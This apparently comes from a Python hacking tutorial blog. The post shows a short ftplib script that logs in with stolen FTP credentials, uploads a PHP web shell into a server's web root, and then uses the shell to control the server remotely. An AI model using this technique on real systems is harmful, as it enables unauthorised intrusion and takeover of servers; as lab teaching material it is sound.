Post List

Wednesday, November 7, 2018

17. Python FTP Web Shell Attack


We have found the FTP login and web directory information. Now let’s login by using FTP and uploading the Web Shell file. We also attempted a Web Shell attack in the Web Hacking chapter. It is very difficult to upload a file in a Web Shell attack by using a web service due to the web server limiting the format and extensions of the files that are uploaded. However, FTP can directly upload a file in a variety of formats. It is very easy to search for robust Web Shell files on the Internet. Let's use Google to download the Web Shell file from the site “https://code.google.com/p/webshell-php/downloads/detail?name=webshell.php”. If the link does not work, you can easily find another one with Google.

Figure 17-1 FTP Web Shell Attack

The “ftplib” module provides functions to transfer files and to make changes to the directories. A few lines of code can be used to simply implement the logic. Once the Web Shell file has been uploaded, the hacker can control the server PC remotely from any PC that is connected to the Internet.
from ftplib import FTP
apacheDir = "htdocs"
serverName = "server"
serverID = "server"
serverPW = "server"
ftp = FTP(serverName, serverID, serverPW)    #(1)
ftp.cwd("APM_Setup/htdocs")                  #(2)
fp = open("webshell.php","rb")               #(3)
ftp.storbinary("STOR webshell.php",fp)       #(4)
fp.close()
ftp.quit()
Example 17-1 FTP Web Shell Attack

A file transfer can be completed in less than 10 lines of code. Python can be used to create a hacking program in a shorter period of time than when using JAVA and the C language. The detailed operation of the file transfer is as follows.

(1) FTP Login: The information that was obtained by hacking can be used to login to the server PC via FTP.

(2) Changing Directory: Move to the directory where the Web service is installed.

(3) Opening File: Open the php file where the Web Shell function is built-in.

(4) Transfering File: Upload the Web Shell file to the directory where the Web Services are installed on the server PC.

When the file transfer is complete, open the browser and run the Web Shell attack. Enter “http: //server/webshell.php” into the address bar and you may see the following screen. You can change the directory, display the list, and delete and execute the file. It is also possible to upload your files directly from the screen, and you can try a variety of attacks.

Figure 17-2 FTP Web Shell Result

Let's summarize the process for the hacking techniques that have been tested until now. Port scanning can be used to discover ports that are being serviced, so find the server that has opened an FTP service and steal the password by using the Password Cracking technique. Identify the location of web services by exploring the Directory Listing. Upload a Web Shell file to gain control of the server PC. By putting the above processes together, we can develop a program that can automatically return only vulnerable URLs.


at
Labels: , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

27.Python Stack-Based Buffer Overflow

27.1 Introduction   Figure 27-1 Stack Based Buffer Overflow Basic Concept Stack-based buffer overflow techniques takes advantage...

  • 04. API hook utilizing pydbg module
    Let's use pydbg, a debugger module that was developed to take advantage of the Win32 API. To properly utilize the pydbg module, the ba...
  • 05. Image File Hacking
    1. Overview of Image File Hacking Python provides very powerful features to handle files. Python can open a binary file and can change o...
  • 02.Basic Concept for a Windows Application
    In order to hack a Windows application using Python, it is necessary to have basic knowledge of the Windows API. Windows API consists of ...